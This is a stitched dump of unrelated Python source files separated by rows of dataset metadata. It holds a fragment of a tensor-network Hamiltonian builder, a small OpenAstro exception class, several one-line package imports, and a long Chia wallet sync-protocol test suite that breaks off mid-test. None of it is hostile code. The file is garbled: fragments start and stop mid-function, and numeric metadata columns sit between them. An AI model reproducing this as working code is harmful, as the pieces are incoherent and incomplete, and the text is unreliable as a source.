for i,dim in enumerate(dimW):
Ham.W[i] = np.zeros(dim)
# Left Bond
Ham.W[0][0,0,:,:] = - h*Sx
for k in nn[0]:
Ham.W[0][0,k,:,:] = -J*Sz
Ham.W[0][0,-1,:,:] = np.eye(2)
# Right Bond
Ham.W[-1][0,0,:,:] = np.eye(2)
Ham.W[-1][1,0,:,:] = Sz
Ham.W[-1][2,0,:,:] = -h*Sx
# Bulk Bonds
for i in range(1,L**2-1):
Ham.W[i][0,0,:,:] = np.eye(2)
Ham.W[i][-1,0,:,:] = -h*Sx
Ham.W[i][1,0,:,:] = Sz
for k in nn[i]:
Ham.W[i][-1,k,:,:] = -J*Sz
for k in range(2,Ham.W[i].shape[0]-1):
Ham.W[i][k,k-1,:,:] = np.eye(2)
Ham.W[i][-1,-1,:,:] = np.eye(2)
return Ham | 27.983936 | 73 | 0.389925 | 1,184 | 6,968 | 2.269426 | 0.065878 | 0.050614 | 0.049125 | 0.026051 | 0.786379 | 0.777075 | 0.740975 | 0.732788 | 0.727577 | 0.727577 | 0 | 0.078856 | 0.383037 | 6,968 | 249 | 74 | 27.983936 | 0.546174 | 0.017652 | 0 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.039216 | false | 0 | 0.009804 | 0 | 0.088235 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6a73d111c86fbf8b1769423cc303eb6c958c790b | 236 | py | Python | openastro/exceptions.py | Emptyset110/OpenAstro | 22daeda2a76bf231b375e078de6718741c0ca646 | [
"Apache-2.0"
] | null | null | null | openastro/exceptions.py | Emptyset110/OpenAstro | 22daeda2a76bf231b375e078de6718741c0ca646 | [
"Apache-2.0"
] | null | null | null | openastro/exceptions.py | Emptyset110/OpenAstro | 22daeda2a76bf231b375e078de6718741c0ca646 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
class WrongFilePath(BaseException):
def __init__(self, wrong_file_path=""):
self.wrong_file_path = wrong_file_path
def __str__(self):
return "File {} does not exist.".format(self.wrong_file_path) | 33.714286 | 69 | 0.70339 | 32 | 236 | 4.6875 | 0.5625 | 0.24 | 0.346667 | 0.34 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005181 | 0.182203 | 236 | 7 | 69 | 33.714286 | 0.772021 | 0.055085 | 0 | 0 | 0 | 0 | 0.103604 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0 | 0 | 0.2 | 0.8 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 6 |
6a84b61bd459ba50c2a99865c9b9524099621eb6 | 38 | py | Python | simpleemailbot/__init__.py | cdmacfadyen/emailbot | 1bc8769179e5722e4a7634f6d5f7dd8521af155f | [
"MIT"
] | null | null | null | simpleemailbot/__init__.py | cdmacfadyen/emailbot | 1bc8769179e5722e4a7634f6d5f7dd8521af155f | [
"MIT"
] | 2 | 2020-10-23T11:32:34.000Z | 2020-10-23T11:33:22.000Z | simpleemailbot/__init__.py | cdmacfadyen/emailbot | 1bc8769179e5722e4a7634f6d5f7dd8521af155f | [
"MIT"
] | null | null | null | from .simpleemailbot import EmailBot
| 12.666667 | 36 | 0.842105 | 4 | 38 | 8 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.131579 | 38 | 2 | 37 | 19 | 0.969697 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6aa21ae16fdfb019f9b457feefddd378af1de6a2 | 43 | py | Python | wikireader/wiki/__init__.py | mke21/wikireader | 767422a736498d5147650cae52a89da7d0c43b65 | [
"MIT"
] | null | null | null | wikireader/wiki/__init__.py | mke21/wikireader | 767422a736498d5147650cae52a89da7d0c43b65 | [
"MIT"
] | 7 | 2020-11-12T20:16:14.000Z | 2020-11-18T20:33:16.000Z | wikireader/wiki/__init__.py | mke21/wikireader | 767422a736498d5147650cae52a89da7d0c43b65 | [
"MIT"
] | null | null | null | from .mine_wiki import search, get_article
| 21.5 | 42 | 0.837209 | 7 | 43 | 4.857143 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.116279 | 43 | 1 | 43 | 43 | 0.894737 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6aa4872a4c3b5f39ddcd2087db0187ce1f2cb107 | 84 | py | Python | app/models/__init__.py | BlueJillYang/blog | 16caf25af310b22e5c54f690e0b8cde9aff48cef | [
"Apache-2.0"
] | null | null | null | app/models/__init__.py | BlueJillYang/blog | 16caf25af310b22e5c54f690e0b8cde9aff48cef | [
"Apache-2.0"
] | null | null | null | app/models/__init__.py | BlueJillYang/blog | 16caf25af310b22e5c54f690e0b8cde9aff48cef | [
"Apache-2.0"
] | null | null | null | from .user import *
from .upload import *
db.generate_mapping(create_tables=True)
| 14 | 39 | 0.77381 | 12 | 84 | 5.25 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.130952 | 84 | 5 | 40 | 16.8 | 0.863014 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0ab1b2de6f18588880c64247b448d4467d29b560 | 30,625 | py | Python | tests/wallet/simple_sync/test_simple_sync_protocol.py | ojura/chia-blockchain | 6a754c0b84a4cd73960895964413583071d65c28 | [
"Apache-2.0"
] | null | null | null | tests/wallet/simple_sync/test_simple_sync_protocol.py | ojura/chia-blockchain | 6a754c0b84a4cd73960895964413583071d65c28 | [
"Apache-2.0"
] | null | null | null | tests/wallet/simple_sync/test_simple_sync_protocol.py | ojura/chia-blockchain | 6a754c0b84a4cd73960895964413583071d65c28 | [
"Apache-2.0"
] | 1 | 2022-03-15T05:17:02.000Z | 2022-03-15T05:17:02.000Z | # flake8: noqa: F811, F401
import asyncio
from typing import List, Optional
import pytest
import pytest_asyncio
from clvm.casts import int_to_bytes
from colorlog import getLogger
from chia.consensus.block_rewards import calculate_pool_reward, calculate_base_farmer_reward
from chia.protocols import wallet_protocol, full_node_protocol
from chia.protocols.full_node_protocol import RespondTransaction
from chia.protocols.protocol_message_types import ProtocolMessageTypes
from chia.protocols.wallet_protocol import RespondToCoinUpdates, CoinStateUpdate, RespondToPhUpdates, CoinState
from chia.server.outbound_message import NodeType
from chia.simulator.simulator_protocol import FarmNewBlockProtocol, ReorgProtocol
from chia.types.blockchain_format.coin import Coin
from chia.types.coin_record import CoinRecord
from chia.types.condition_opcodes import ConditionOpcode
from chia.types.condition_with_args import ConditionWithArgs
from chia.types.peer_info import PeerInfo
from chia.types.spend_bundle import SpendBundle
from chia.util.ints import uint16, uint32, uint64
from chia.wallet.wallet import Wallet
from chia.wallet.wallet_state_manager import WalletStateManager
from tests.connection_utils import add_dummy_connection
from tests.pools.test_pool_rpc import wallet_is_synced
from tests.setup_nodes import setup_simulators_and_wallets
from tests.time_out_assert import time_out_assert
from tests.wallet.cat_wallet.test_cat_wallet import tx_in_pool
from tests.wallet_tools import WalletTool
def wallet_height_at_least(wallet_node, h):
height = wallet_node.wallet_state_manager.blockchain._peak_height
if height == h:
return True
return False
log = getLogger(__name__)
@pytest.fixture(scope="session")
def event_loop():
loop = asyncio.get_event_loop()
yield loop
class TestSimpleSyncProtocol:
@pytest_asyncio.fixture(scope="function")
async def wallet_node_simulator(self):
async for _ in setup_simulators_and_wallets(1, 1, {}):
yield _
@pytest_asyncio.fixture(scope="function")
async def wallet_two_node_simulator(self):
async for _ in setup_simulators_and_wallets(2, 1, {}):
yield _
async def get_all_messages_in_queue(self, queue):
all_messages = []
await asyncio.sleep(2)
while not queue.empty():
message, peer = await queue.get()
all_messages.append(message)
return all_messages
@pytest.mark.asyncio
async def test_subscribe_for_ph(self, wallet_node_simulator, self_hostname):
num_blocks = 4
full_nodes, wallets = wallet_node_simulator
full_node_api = full_nodes[0]
wallet_node, server_2 = wallets[0]
fn_server = full_node_api.full_node.server
wsm: WalletStateManager = wallet_node.wallet_state_manager
await server_2.start_client(PeerInfo(self_hostname, uint16(fn_server._port)), None)
incoming_queue, peer_id = await add_dummy_connection(fn_server, self_hostname, 12312, NodeType.WALLET)
zero_ph = 32 * b"\0"
junk_ph = 32 * b"\a"
fake_wallet_peer = fn_server.all_connections[peer_id]
msg = wallet_protocol.RegisterForPhUpdates([zero_ph], 0)
msg_response = await full_node_api.register_interest_in_puzzle_hash(msg, fake_wallet_peer)
assert msg_response.type == ProtocolMessageTypes.respond_to_ph_update.value
data_response: RespondToPhUpdates = RespondToCoinUpdates.from_bytes(msg_response.data)
assert data_response.coin_states == []
# Farm few more with reward
for i in range(0, num_blocks):
if i == num_blocks - 1:
await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(zero_ph))
await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(junk_ph))
else:
await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(zero_ph))
msg = wallet_protocol.RegisterForPhUpdates([zero_ph], 0)
msg_response = await full_node_api.register_interest_in_puzzle_hash(msg, fake_wallet_peer)
assert msg_response.type == ProtocolMessageTypes.respond_to_ph_update.value
data_response: RespondToPhUpdates = RespondToCoinUpdates.from_bytes(msg_response.data)
assert len(data_response.coin_states) == 2 * num_blocks # 2 per height farmer / pool reward
# Farm more rewards to check the incoming queue for the updates
for i in range(0, num_blocks):
if i == num_blocks - 1:
await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(zero_ph))
await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(junk_ph))
else:
await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(zero_ph))
all_messages = await self.get_all_messages_in_queue(incoming_queue)
zero_coin = await full_node_api.full_node.coin_store.get_coin_states_by_puzzle_hashes(True, [zero_ph])
all_zero_coin = set(zero_coin)
notified_zero_coins = set()
for message in all_messages:
if message.type == ProtocolMessageTypes.coin_state_update.value:
data_response: CoinStateUpdate = CoinStateUpdate.from_bytes(message.data)
for coin_state in data_response.items:
notified_zero_coins.add(coin_state)
assert len(data_response.items) == 2 # 2 per height farmer / pool reward
assert all_zero_coin == notified_zero_coins
# Test subscribing to more coins
one_ph = 32 * b"\1"
msg = wallet_protocol.RegisterForPhUpdates([one_ph], 0)
msg_response = await full_node_api.register_interest_in_puzzle_hash(msg, fake_wallet_peer)
peak = full_node_api.full_node.blockchain.get_peak()
for i in range(0, num_blocks):
if i == num_blocks - 1:
await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(zero_ph))
await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(junk_ph))
else:
await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(zero_ph))
for i in range(0, num_blocks):
if i == num_blocks - 1:
await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(one_ph))
await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(junk_ph))
else:
await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(one_ph))
zero_coins = await full_node_api.full_node.coin_store.get_coin_states_by_puzzle_hashes(
True, [zero_ph], peak.height + 1
)
one_coins = await full_node_api.full_node.coin_store.get_coin_states_by_puzzle_hashes(True, [one_ph])
all_coins = set(zero_coins)
all_coins.update(one_coins)
all_messages = await self.get_all_messages_in_queue(incoming_queue)
notified_all_coins = set()
for message in all_messages:
if message.type == ProtocolMessageTypes.coin_state_update.value:
data_response: CoinStateUpdate = CoinStateUpdate.from_bytes(message.data)
for coin_state in data_response.items:
notified_all_coins.add(coin_state)
assert len(data_response.items) == 2 # 2 per height farmer / pool reward
assert all_coins == notified_all_coins
wsm: WalletStateManager = wallet_node.wallet_state_manager
wallet: Wallet = wsm.wallets[1]
puzzle_hash = await wallet.get_new_puzzlehash()
for i in range(0, num_blocks):
if i == num_blocks - 1:
await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(puzzle_hash))
await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(junk_ph))
else:
await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(puzzle_hash))
funds = sum(
[
calculate_pool_reward(uint32(i)) + calculate_base_farmer_reward(uint32(i))
for i in range(1, num_blocks + 1)
]
)
fn_amount = sum(
cr.coin.amount
for cr in await full_node_api.full_node.coin_store.get_coin_records_by_puzzle_hash(False, puzzle_hash)
)
await time_out_assert(15, wallet.get_confirmed_balance, funds)
assert funds == fn_amount
msg_1 = wallet_protocol.RegisterForPhUpdates([puzzle_hash], 0)
msg_response_1 = await full_node_api.register_interest_in_puzzle_hash(msg_1, fake_wallet_peer)
assert msg_response_1.type == ProtocolMessageTypes.respond_to_ph_update.value
data_response_1: RespondToPhUpdates = RespondToCoinUpdates.from_bytes(msg_response_1.data)
assert len(data_response_1.coin_states) == 2 * num_blocks # 2 per height farmer / pool reward
await time_out_assert(10, wallet_is_synced, True, wallet_node, full_node_api)
tx_record = await wallet.generate_signed_transaction(uint64(10), puzzle_hash, uint64(0))
assert len(tx_record.spend_bundle.removals()) == 1
spent_coin = tx_record.spend_bundle.removals()[0]
assert spent_coin.puzzle_hash == puzzle_hash
await wallet.push_transaction(tx_record)
await time_out_assert(
15, tx_in_pool, True, full_node_api.full_node.mempool_manager, tx_record.spend_bundle.name()
)
for i in range(0, num_blocks):
await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(puzzle_hash))
# Let's make sure the wallet can handle a non ephemeral launcher
from chia.wallet.puzzles.singleton_top_layer import SINGLETON_LAUNCHER_HASH
await time_out_assert(10, wallet_is_synced, True, wallet_node, full_node_api)
tx_record = await wallet.generate_signed_transaction(uint64(10), SINGLETON_LAUNCHER_HASH, uint64(0))
await wallet.push_transaction(tx_record)
await time_out_assert(
15, tx_in_pool, True, full_node_api.full_node.mempool_manager, tx_record.spend_bundle.name()
)
for i in range(0, num_blocks):
await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(SINGLETON_LAUNCHER_HASH))
await time_out_assert(10, wallet_is_synced, True, wallet_node, full_node_api)
# Send a transaction to make sure the wallet is still running
tx_record = await wallet.generate_signed_transaction(uint64(10), junk_ph, uint64(0))
await wallet.push_transaction(tx_record)
await time_out_assert(
15, tx_in_pool, True, full_node_api.full_node.mempool_manager, tx_record.spend_bundle.name()
)
for i in range(0, num_blocks):
await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(puzzle_hash))
all_messages = await self.get_all_messages_in_queue(incoming_queue)
notified_state = None
for message in all_messages:
if message.type == ProtocolMessageTypes.coin_state_update.value:
data_response: CoinStateUpdate = CoinStateUpdate.from_bytes(message.data)
for coin_state in data_response.items:
if coin_state.coin.name() == spent_coin.name():
notified_state = coin_state
assert notified_state is not None
assert notified_state.coin == spent_coin
assert notified_state.spent_height is not None
@pytest.mark.asyncio
async def test_subscribe_for_coin_id(self, wallet_node_simulator, self_hostname):
num_blocks = 4
full_nodes, wallets = wallet_node_simulator
full_node_api = full_nodes[0]
wallet_node, server_2 = wallets[0]
fn_server = full_node_api.full_node.server
wsm: WalletStateManager = wallet_node.wallet_state_manager
standard_wallet: Wallet = wsm.wallets[1]
puzzle_hash = await standard_wallet.get_new_puzzlehash()
await server_2.start_client(PeerInfo(self_hostname, uint16(fn_server._port)), None)
incoming_queue, peer_id = await add_dummy_connection(fn_server, self_hostname, 12312, NodeType.WALLET)
fake_wallet_peer = fn_server.all_connections[peer_id]
# Farm to create a coin that we'll track
for i in range(0, num_blocks):
await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(puzzle_hash))
funds = sum(
[calculate_pool_reward(uint32(i)) + calculate_base_farmer_reward(uint32(i)) for i in range(1, num_blocks)]
)
await time_out_assert(15, standard_wallet.get_confirmed_balance, funds)
my_coins: List[CoinRecord] = await full_node_api.full_node.coin_store.get_coin_records_by_puzzle_hash(
True, puzzle_hash
)
coin_to_spend = my_coins[0].coin
msg = wallet_protocol.RegisterForCoinUpdates([coin_to_spend.name()], 0)
msg_response = await full_node_api.register_interest_in_coin(msg, fake_wallet_peer)
assert msg_response is not None
assert msg_response.type == ProtocolMessageTypes.respond_to_coin_update.value
data_response: RespondToCoinUpdates = RespondToCoinUpdates.from_bytes(msg_response.data)
assert data_response.coin_states[0].coin == coin_to_spend
coins = set()
coins.add(coin_to_spend)
tx_record = await standard_wallet.generate_signed_transaction(uint64(10), puzzle_hash, uint64(0), coins=coins)
await standard_wallet.push_transaction(tx_record)
await time_out_assert(
15, tx_in_pool, True, full_node_api.full_node.mempool_manager, tx_record.spend_bundle.name()
)
# Farm transaction
for i in range(0, num_blocks):
await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(puzzle_hash))
all_messages = await self.get_all_messages_in_queue(incoming_queue)
notified_coins = set()
for message in all_messages:
if message.type == ProtocolMessageTypes.coin_state_update.value:
data_response: CoinStateUpdate = CoinStateUpdate.from_bytes(message.data)
for coin_state in data_response.items:
notified_coins.add(coin_state.coin)
assert coin_state.spent_height is not None
assert notified_coins == coins
# Test getting notification for coin that is about to be created
await time_out_assert(10, wallet_is_synced, True, wallet_node, full_node_api)
tx_record = await standard_wallet.generate_signed_transaction(uint64(10), puzzle_hash, uint64(0))
tx_record.spend_bundle.additions()
added_target: Optional[Coin] = None
for coin in tx_record.spend_bundle.additions():
if coin.puzzle_hash == puzzle_hash:
added_target = coin
assert added_target is not None
msg = wallet_protocol.RegisterForCoinUpdates([added_target.name()], 0)
msg_response = await full_node_api.register_interest_in_coin(msg, fake_wallet_peer)
assert msg_response is not None
assert msg_response.type == ProtocolMessageTypes.respond_to_coin_update.value
data_response: RespondToCoinUpdates = RespondToCoinUpdates.from_bytes(msg_response.data)
assert len(data_response.coin_states) == 0
await standard_wallet.push_transaction(tx_record)
await time_out_assert(
15, tx_in_pool, True, full_node_api.full_node.mempool_manager, tx_record.spend_bundle.name()
)
for i in range(0, num_blocks):
await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(puzzle_hash))
all_messages = await self.get_all_messages_in_queue(incoming_queue)
notified_state = None
for message in all_messages:
if message.type == ProtocolMessageTypes.coin_state_update.value:
data_response: CoinStateUpdate = CoinStateUpdate.from_bytes(message.data)
for coin_state in data_response.items:
if coin_state.coin.name() == added_target.name():
notified_state = coin_state
assert notified_state is not None
assert notified_state.coin == added_target
assert notified_state.spent_height is None
@pytest.mark.asyncio
async def test_subscribe_for_ph_reorg(self, wallet_node_simulator, self_hostname):
num_blocks = 4
long_blocks = 20
full_nodes, wallets = wallet_node_simulator
full_node_api = full_nodes[0]
wallet_node, server_2 = wallets[0]
fn_server = full_node_api.full_node.server
wsm: WalletStateManager = wallet_node.wallet_state_manager
standard_wallet: Wallet = wsm.wallets[1]
puzzle_hash = await standard_wallet.get_new_puzzlehash()
await server_2.start_client(PeerInfo(self_hostname, uint16(fn_server._port)), None)
incoming_queue, peer_id = await add_dummy_connection(fn_server, self_hostname, 12312, NodeType.WALLET)
fake_wallet_peer = fn_server.all_connections[peer_id]
zero_ph = 32 * b"\0"
# Farm to create a coin that we'll track
for i in range(0, num_blocks):
await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(zero_ph))
for i in range(0, long_blocks):
await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(zero_ph))
msg = wallet_protocol.RegisterForPhUpdates([puzzle_hash], 0)
msg_response = await full_node_api.register_interest_in_puzzle_hash(msg, fake_wallet_peer)
assert msg_response is not None
await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(puzzle_hash))
for i in range(0, num_blocks):
await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(zero_ph))
expected_height = uint32(long_blocks + 2 * num_blocks + 1)
await time_out_assert(15, full_node_api.full_node.blockchain.get_peak_height, expected_height)
coin_records = await full_node_api.full_node.coin_store.get_coin_records_by_puzzle_hash(True, puzzle_hash)
assert len(coin_records) > 0
fork_height = expected_height - num_blocks - 5
req = ReorgProtocol(fork_height, expected_height + 5, zero_ph)
await full_node_api.reorg_from_index_to_new_index(req)
coin_records = await full_node_api.full_node.coin_store.get_coin_records_by_puzzle_hash(True, puzzle_hash)
assert coin_records == []
all_messages = await self.get_all_messages_in_queue(incoming_queue)
coin_update_messages = []
for message in all_messages:
if message.type == ProtocolMessageTypes.coin_state_update.value:
data_response: CoinStateUpdate = CoinStateUpdate.from_bytes(message.data)
coin_update_messages.append(data_response)
# First state is creation, second one is a reorg
assert len(coin_update_messages) == 2
first = coin_update_messages[0]
assert len(first.items) == 2
first_state_coin_1 = first.items[0]
assert first_state_coin_1.spent_height is None
assert first_state_coin_1.created_height is not None
first_state_coin_2 = first.items[1]
assert first_state_coin_2.spent_height is None
assert first_state_coin_2.created_height is not None
second = coin_update_messages[1]
assert second.fork_height == fork_height
assert len(second.items) == 2
second_state_coin_1 = second.items[0]
assert second_state_coin_1.spent_height is None
assert second_state_coin_1.created_height is None
second_state_coin_2 = second.items[1]
assert second_state_coin_2.spent_height is None
assert second_state_coin_2.created_height is None
@pytest.mark.asyncio
async def test_subscribe_for_coin_id_reorg(self, wallet_node_simulator, self_hostname):
num_blocks = 4
long_blocks = 20
full_nodes, wallets = wallet_node_simulator
full_node_api = full_nodes[0]
wallet_node, server_2 = wallets[0]
fn_server = full_node_api.full_node.server
wsm: WalletStateManager = wallet_node.wallet_state_manager
standard_wallet: Wallet = wsm.wallets[1]
puzzle_hash = await standard_wallet.get_new_puzzlehash()
await server_2.start_client(PeerInfo(self_hostname, uint16(fn_server._port)), None)
incoming_queue, peer_id = await add_dummy_connection(fn_server, self_hostname, 12312, NodeType.WALLET)
fake_wallet_peer = fn_server.all_connections[peer_id]
zero_ph = 32 * b"\0"
# Farm to create a coin that we'll track
for i in range(0, num_blocks):
await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(zero_ph))
for i in range(0, long_blocks):
await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(zero_ph))
await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(puzzle_hash))
for i in range(0, num_blocks):
await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(zero_ph))
expected_height = uint32(long_blocks + 2 * num_blocks + 1)
await time_out_assert(15, full_node_api.full_node.blockchain.get_peak_height, expected_height)
coin_records = await full_node_api.full_node.coin_store.get_coin_records_by_puzzle_hash(True, puzzle_hash)
assert len(coin_records) > 0
for coin_rec in coin_records:
msg = wallet_protocol.RegisterForCoinUpdates([coin_rec.name], 0)
msg_response = await full_node_api.register_interest_in_coin(msg, fake_wallet_peer)
assert msg_response is not None
fork_height = expected_height - num_blocks - 5
req = ReorgProtocol(fork_height, expected_height + 5, zero_ph)
await full_node_api.reorg_from_index_to_new_index(req)
coin_records = await full_node_api.full_node.coin_store.get_coin_records_by_puzzle_hash(True, puzzle_hash)
assert coin_records == []
all_messages = await self.get_all_messages_in_queue(incoming_queue)
coin_update_messages = []
for message in all_messages:
if message.type == ProtocolMessageTypes.coin_state_update.value:
data_response: CoinStateUpdate = CoinStateUpdate.from_bytes(message.data)
coin_update_messages.append(data_response)
assert len(coin_update_messages) == 1
update = coin_update_messages[0]
coin_states = update.items
assert len(coin_states) == 2
first_coin = coin_states[0]
assert first_coin.spent_height is None
assert first_coin.created_height is None
second_coin = coin_states[1]
assert second_coin.spent_height is None
assert second_coin.created_height is None
@pytest.mark.asyncio
async def test_subscribe_for_hint(self, bt, wallet_node_simulator, self_hostname):
num_blocks = 4
full_nodes, wallets = wallet_node_simulator
full_node_api = full_nodes[0]
wallet_node, server_2 = wallets[0]
fn_server = full_node_api.full_node.server
wsm: WalletStateManager = wallet_node.wallet_state_manager
await server_2.start_client(PeerInfo(self_hostname, uint16(fn_server._port)), None)
incoming_queue, peer_id = await add_dummy_connection(fn_server, self_hostname, 12312, NodeType.WALLET)
wt: WalletTool = bt.get_pool_wallet_tool()
ph = wt.get_new_puzzlehash()
for i in range(0, num_blocks):
await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(ph))
await asyncio.sleep(6)
coins = await full_node_api.full_node.coin_store.get_coin_records_by_puzzle_hashes(False, [ph])
coin_spent = coins[0].coin
hint_puzzle_hash = 32 * b"\2"
amount = 1
amount_bin = int_to_bytes(1)
hint = 32 * b"\5"
fake_wallet_peer = fn_server.all_connections[peer_id]
msg = wallet_protocol.RegisterForPhUpdates([hint], 0)
msg_response = await full_node_api.register_interest_in_puzzle_hash(msg, fake_wallet_peer)
assert msg_response.type == ProtocolMessageTypes.respond_to_ph_update.value
data_response: RespondToPhUpdates = RespondToCoinUpdates.from_bytes(msg_response.data)
assert len(data_response.coin_states) == 0
condition_dict = {
ConditionOpcode.CREATE_COIN: [
ConditionWithArgs(ConditionOpcode.CREATE_COIN, [hint_puzzle_hash, amount_bin, hint])
]
}
await time_out_assert(10, wallet_is_synced, True, wallet_node, full_node_api)
tx: SpendBundle = wt.generate_signed_transaction(
10,
wt.get_new_puzzlehash(),
coin_spent,
condition_dic=condition_dict,
)
await full_node_api.respond_transaction(RespondTransaction(tx), fake_wallet_peer)
await time_out_assert(15, tx_in_pool, True, full_node_api.full_node.mempool_manager, tx.name())
for i in range(0, num_blocks):
await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(ph))
all_messages = await self.get_all_messages_in_queue(incoming_queue)
notified_state = None
for message in all_messages:
if message.type == ProtocolMessageTypes.coin_state_update.value:
data_response: CoinStateUpdate = CoinStateUpdate.from_bytes(message.data)
notified_state = data_response
break
assert notified_state is not None
assert notified_state.items[0].coin == Coin(coin_spent.name(), hint_puzzle_hash, amount)
msg = wallet_protocol.RegisterForPhUpdates([hint], 0)
msg_response = await full_node_api.register_interest_in_puzzle_hash(msg, fake_wallet_peer)
assert msg_response.type == ProtocolMessageTypes.respond_to_ph_update.value
data_response: RespondToPhUpdates = RespondToCoinUpdates.from_bytes(msg_response.data)
assert len(data_response.coin_states) == 1
coin_records: List[CoinRecord] = await full_node_api.full_node.coin_store.get_coin_records_by_puzzle_hash(
True, hint_puzzle_hash
)
assert len(coin_records) == 1
assert data_response.coin_states[0] == coin_records[0].coin_state
@pytest.mark.asyncio
async def test_subscribe_for_hint_long_sync(self, wallet_two_node_simulator, bt, self_hostname):
num_blocks = 4
full_nodes, wallets = wallet_two_node_simulator
full_node_api = full_nodes[0]
full_node_api_1 = full_nodes[1]
wallet_node, server_2 = wallets[0]
fn_server = full_node_api.full_node.server
fn_server_1 = full_node_api_1.full_node.server
wsm: WalletStateManager = wallet_node.wallet_state_manager
await server_2.start_client(PeerInfo(self_hostname, uint16(fn_server._port)), None)
incoming_queue, peer_id = await add_dummy_connection(fn_server, self_hostname, 12312, NodeType.WALLET)
incoming_queue_1, peer_id_1 = await add_dummy_connection(fn_server_1, self_hostname, 12313, NodeType.WALLET)
wt: WalletTool = bt.get_pool_wallet_tool()
ph = wt.get_new_puzzlehash()
for i in range(0, num_blocks):
await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(ph))
await asyncio.sleep(6)
coins = await full_node_api.full_node.coin_store.get_coin_records_by_puzzle_hashes(False, [ph])
coin_spent = coins[0].coin
hint_puzzle_hash = 32 * b"\2"
amount = 1
amount_bin = int_to_bytes(1)
hint = 32 * b"\5"
fake_wallet_peer = fn_server.all_connections[peer_id]
fake_wallet_peer_1 = fn_server_1.all_connections[peer_id_1]
msg = wallet_protocol.RegisterForPhUpdates([hint], 0)
msg_response = await full_node_api.register_interest_in_puzzle_hash(msg, fake_wallet_peer)
msg_response_1 = await full_node_api_1.register_interest_in_puzzle_hash(msg, fake_wallet_peer_1)
assert msg_response.type == ProtocolMessageTypes.respond_to_ph_update.value
data_response: RespondToPhUpdates = RespondToCoinUpdates.from_bytes(msg_response.data)
assert len(data_response.coin_states) == 0
condition_dict = {
ConditionOpcode.CREATE_COIN: [
ConditionWithArgs(ConditionOpcode.CREATE_COIN, [hint_puzzle_hash, amount_bin, hint])
]
}
await time_out_assert(10, wallet_is_synced, True, wallet_node, full_node_api)
tx: SpendBundle = wt.generate_signed_transaction(
10,
wt.get_new_puzzlehash(),
coin_spent,
condition_dic=condition_dict,
)
